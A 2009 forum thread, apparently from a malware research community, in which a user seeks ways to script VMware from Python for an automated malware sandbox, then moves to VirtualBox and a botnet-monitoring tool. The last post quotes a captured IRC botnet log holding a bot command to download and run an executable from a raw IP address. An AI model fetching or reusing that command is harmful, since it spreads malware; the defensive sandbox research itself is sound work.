Author Topic: What tools can I use to script VMWare Workstation in Python?  (Read 8278 times)

0 Members and 1 Guest are viewing this topic.

August 09, 2009, 12:02:56 pm
Read 8278 times

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Hi all gurus,

Could use some help and directions.

I have Windows in VMware that I want to control from my VM Host to start/stop/revert/run programs. I am aiming to build an automated, simplified but specialized malware sandbox to extract pcap files (yadayada... anubis is too slow). However, the Pyvix doesn't seem to be updated for 3 years already, and it isn't just the compilation issue ( it seems ) but mismatching binaries, and so.

My questions :
1. If I want to script VMware workstation in Python, what are the solutions out there?
2. What are the usual solutions as used by you experts in industries and focused academics?

Thank you.

Log0



"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 09, 2009, 12:22:01 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
You have to install VMWARE VIX API first.

http://www.vmware.com/support/developer/vix-api/

This api provides bindings for for C, Perl, and COM (Visual Basic, VBscript, C#).
VMWARE doesn't provide bindings for python,but there are python bindings.
Look here:

http://groups.google.com/group/vmkernelnewbies/browse_thread/thread/b910fe85b1eebcb2

I haven't used the python bindings, so I don't know how well it works.

 
Ruining the bad guy's day

August 09, 2009, 02:08:34 pm
Reply #2

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Hi SysAdMini,

Yes I have installed the ViX. =)

Here is the extract I obtained from pyvix, it looks oooooooooooooooold !!!!!!

pyvix-2006.07.18-source.zip          32.2 KiB     Tue Jul 18 2006 14:44     939

So, I'm just curious if it's a "declared dead" library?

===

BTW, so most people still use the C interface of ViX ( perhaps Perl? ) to automate only?
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 09, 2009, 02:42:05 pm
Reply #3

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Aha, that new updated code works better... got some new errors, but there goes the progress. Thanks SysAdMini. =)
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 09, 2009, 04:14:12 pm
Reply #4

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Didn't really mean to bug... anyone got this error?

I found this is a pretty common unanswered problem ... not any solutions I got ...

VIX_E_WRAPPER_SERVICEPROVIDER_NOT_FOUND      = 22003
pyvix.vix.VIXException: The system returned an error. Communication with the virtual machine may have been interrupted

I used the powerOn.c helloworld code provided by Vmware. Anyway..it fails at connect.
I'll continue to work on and see what's going to come back... but if anyone have met this, please kindly offer advice.

I really need to post an article on this common problem after I've solved it. =)

Thank you very much.
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 11, 2009, 05:05:09 pm
Reply #5

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Yayayaya, I abandoned vmware and picked up (free) virtualbox. Somehow the installation of ViX didn't work quite well, but why bother fix when there's easier way. Waste no time.

There goes vboxmanage , which does it in a simpler way.

for those interested, I'm building a automated tool for infiltrating botnets... let's see what comes out.

Thanks.
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 12, 2009, 06:33:15 pm
Reply #6

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Look forward to seeing the results :) (looking into setting up automated analysis myself too)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

August 12, 2009, 06:40:05 pm
Reply #7

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
I have tested virtualbox a few months ago. I was unable to setup a network bridge to my wireless lan adapter.
I'm wondering if it works in the current virtualbox version. If yes, then I would give it a second chance.
Ruining the bad guy's day

August 22, 2009, 04:40:53 am
Reply #8

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
>>SysAdMini

oops... a lil busy and then workin' then.

Didn't try bridge wireless before, top two from google :
http://ubuntuforums.org/showthread.php?t=724783h
http://forums.virtualbox.org/viewtopic.php?t=1787

Any luck?

I basically have a tool that can grep traffic for myself, now need to piece up a bot and everything altogether.

===

>> MysteryFCM

Sure, it is just a few piece of spread out technology pieced together... I guess a lot of ppl in MDL alrdy got them?
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org

August 23, 2009, 01:00:32 pm
Reply #9

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
I guess most of these are basic tools to most ppl...everyone gotta build their own guns!

The malware caught - 6/41 ( 14.63 % ) ouch.


Basic

2009-08-23 18:27:20,644 - log-6 - INFO - Received : [:irc.efnet.com 332 [ #xx6 :.flushdns |.down -S |.update -S |.update http://94.76.194.116/xx8.exe x5s5g6q3x1n3.exe x5s5g6q3x1n3]
...

but sadly, still doing it wrong. =)

2009-08-23 18:27:23,560 - log-6 - INFO - Received : [ERROR :Closing Link: [[<my ip>] (Client hat die Verbindung getrennt)]

German stuffs.

Workin' workin' ...
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org